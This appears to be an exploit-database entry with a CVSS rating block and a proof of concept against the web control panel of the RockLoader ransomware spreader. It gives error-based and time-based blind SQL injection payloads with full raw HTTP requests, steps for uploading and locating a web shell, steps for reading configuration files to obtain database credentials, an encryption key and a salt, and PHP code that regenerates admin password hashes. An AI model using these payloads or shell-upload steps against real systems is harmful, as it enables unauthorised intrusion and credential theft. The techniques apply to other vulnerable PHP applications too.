The vulnerable system is bound to the network stack and the set of possible attackers extends beyond the other options listed below, up to and including the entire Internet. Such a vulnerability is often termed “remotely exploitable” and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers). An example of a network attack is an attacker causing a denial of service by sending a specially crafted TCP packet across a wide area network (e.g., CVE-2004-0230).
Attack Complexity
Low
AC
The attacker must take no measurable action to exploit the vulnerability. The attack requires no target-specific circumvention to exploit the vulnerability. An attacker can expect repeatable success against the vulnerable system.
Privileges Required
Low
PR
The attacker requires privileges that provide basic capabilities that are typically limited to settings and resources owned by a single low-privileged user. Alternatively, an attacker with Low privileges has the ability to access only non-sensitive resources.
User Interaction
None
UI
The vulnerable system can be exploited without interaction from any human user, other than the attacker. Examples include: a remote attacker is able to send packets to a target system a locally authenticated attacker executes code to elevate privileges
Scope
Unchanged
S
An exploited vulnerability can only affect resources managed by the same security authority. In the case of a vulnerability in a virtualized environment, an exploited vulnerability in one guest instance would not affect neighboring guest instances.
Confidentiality
High
C
There is total information disclosure, resulting in all data on the system being revealed to the attacker, or there is a possibility of the attacker gaining control over confidential data.
Integrity
High
I
There is a total compromise of system integrity. There is a complete loss of system protection, resulting in the attacker being able to modify any file on the target system.
Availability
High
A
There is a total shutdown of the affected resource. The attacker can deny access to the system or data, potentially causing significant loss to the organization.
RockLoader Sql Injection Shell Upload========================================
[!] Exploit Title: RockLoader Sql Injection Shell Upload
[!] Exploit Author: Dyar Sahdi
[!] Home Page: http://www.facebook.com/Dyar.Sahdi.Linux
[!] Contact Me in Email: [email protected]
=========================================
# Platform : PHP / WebApp
+ Cat/Tag : Shell / File Upload , Auth Bypassing , Multiple
----------------------------------------------------------------------------
1. Description
Since last days ... new Bart aka RockLoader malware/rasomware spreader
is active.
My family was a victim of this type of extortion past year.
2. Short info: SQL Injections
NO user registration required.
The Command and Control Server processing the spread requests,user
tasks and responsible for the process, is suffering from mutiple remote
sql injection.
Common C&C server path is "/cp/login/" in most common setups.
Since the specific of the spreader and it's functionality, methods of
encryption and working process,
There is possibility for RCE,MSF/CMD injection and local root post
explotation.
In common cases the setup comes with this specific configs.
- user has full priviligies to host sql server.
- you can interact with local file read in most conditions.
- user is database administrator in most conditions.
- database name and structure are identical since it comes as
phpmyadmin dump.
- file write and read is a must.
- user screen capture plugin on advanced setups.
- default database name is 'appdater'
3. Proof of Concept:
Affected parameters are "username" and "password" via specifict POST
request.
The 3th parameter is the php session.
----=(SQL Injection 1)=----
Type: error-based
Method: POST
Request Type: XMLHttpRequest
Title: MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP
BY clause (FLOOR)
Payload example for POST parameter username:
password=S0M3PaSSw0rd&username=-1' OR 32 AND ROW(9213,8915)>(SELECT
COUNT(*),CONCAT(0x716a707071,(SELECT
(ELT(9213=9213,1))),0x71767a7071,FLOOR(RAND(0)*2))x FROM (SELECT 4118
UNION SELECT 5903 UNION SELECT 7493 UNION SELECT 1139)a GROUP BY x)--
KSxg1=6 AND 000580=000580 --
Example raw request for host: 127.0.0.1
-----------------EXAMPLE--------------------
POST /cp/login/ HTTP/1.1
Content-Length: 87
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: 127.0.0.1/cp/login/
Cookie: PHPSESSID=c4u29lkhiavel5vt14tchcb190
Host: 127.0.0.1
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21
(KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
password=S0M3PaSSw0rd&username=d0na1DTrump
-----------------END--------------------
=================================================================================================================================================================
POC:
----=(SQL Injection 2)=----
Type: AND/OR time-based blind
Method: POST
Request Type: XMLHttpRequest
Title: MySQL >= 5.0.12 AND time-based blind
Payload example for POST parameter username:
password=S0M3PaSSw0rd&username=-1' OR 32 AND SLEEP(5)-- sWMh1=6 AND
000580=000580 --
Example raw request for host: 127.0.0.1
-----------------EXAMPLE--------------------
POST /cp/login/ HTTP/1.1
Content-Length: 87
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: 127.0.0.1/cp/login/
Cookie: PHPSESSID=c4u29lkhiavel5vt14tchcb190
Host: 127.0.0.1
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21
(KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
password=S0M3PaSSw0rd&username=d0na1DTrump
-----------------END--------------------
=================================================================================================================================================================
POC:
----=(Shell Upload POC)=----
Requirements:
- Valid user for control panel.
- Access to database for reading.
Step1:
Upload your shell as new file via Control Panel.
Name it: OWNED
Note: filename is masked in control panel
Step2:
See 'file' table at 'appdater' database.
QUERY: SELECT * FROM `file`;
Look for name=OWNED and coresponding file_path name (EXAMPLE:
C932kc.php)
Step3:
Location of your Shell
http://127.0.0.1/files/c932kc.php
-----------------END--------------------
=================================================================================================================================================================
POC:
----=(Database user and password disclose)=----
Example request to get the directory location:
===============================================
POST /cp/login/ HTTP/1.1
Content-Length: 87
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: 127.0.0.1/cp/login/
Cookie: PHPSESSID=c4u29lkhiavel5vt14tchcb190
Host: 127.0.0.1
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21
(KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
password=S0M3PaSSw0rd&username=d0na1DTrump
===============================================
Response if error reporting is enabled:
<br />
<b>Notice</b>: A session had already been started - ignoring
session_start() in <b>/var/www/html/cp/login/auth.php</b> on line
<b>23</b><br />
===============================================
Read the settings.php file of the control panel to obtain user and
password for database.
location: /var/www/html/cp/settings.php
----Snip-----
<?php
//Debug
ini_set('error_reporting', E_ALL); // REMOVE TO TURN DEBUG OFF
ini_set('display_errors', 1); // REMOVE TO TURN DEBUG OFF
//MySQL settings
define('DB_HOSTNAME', 'localhost');
define('DB_USERNAME', 'root');
define('DB_PASSWORD', '');
define('DB_DATABASE', 'appdater'); <- most of the time this is the
default database since it's come in the bundle.
define('DB_PORT', '3307');
......
---EndSnip---
=================================================================================================================================================================
POC:
----=(XOR Encrypton key and password salt disclose)=----
Read the settings.php file (/var/www/appdater/html/settings.php)
Look at the global configuration for the app.
----Snip-----
//GLOBAL settings
define('XOR_KEY', 'aWL~jH9zJl$5Yfz7'); <- File encryption XOR_KEY
define('FILES_URL', 'https://summerr554fox.su/files/'); <- address of
all uploaded files
define('APPDATER_PATH', '/var/www/html/');
define('SALT', 'KsqwGzTl?Qwq|oHA'); <- SALT KEY FOUND !
?>
---EndSnip---
TADAAAAAAAAAAAAAAAAAAAAAAAAAa we got the password for the sql and even
more: XOR_KEY for file encyption, EXE files location, PATH to the
Control Panel anddd....
The most important --> THE SALT !
=================================================================================================================================================================
POC:
---=(Admin panel password generator)=---
Read the core/functions.php file
(/var/www/appdater/html/core/functions.php)
Look for this
---Snip-----
function create_hash( $string ) {
return substr( sha1( SALT . $string ), 3, 17 );
}
----EndSnip---
TADAAAA so we got and the algo used to create correct user and
password.
<?php
define('SALT', 'KsqwGzTl?Qwq|oHA');
function create_hash( $string ) {
return substr( sha1( SALT . $string ), 3, 17 );
}
echo create_hash('S0M3PaSSw0rd');
?>
===============================================
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum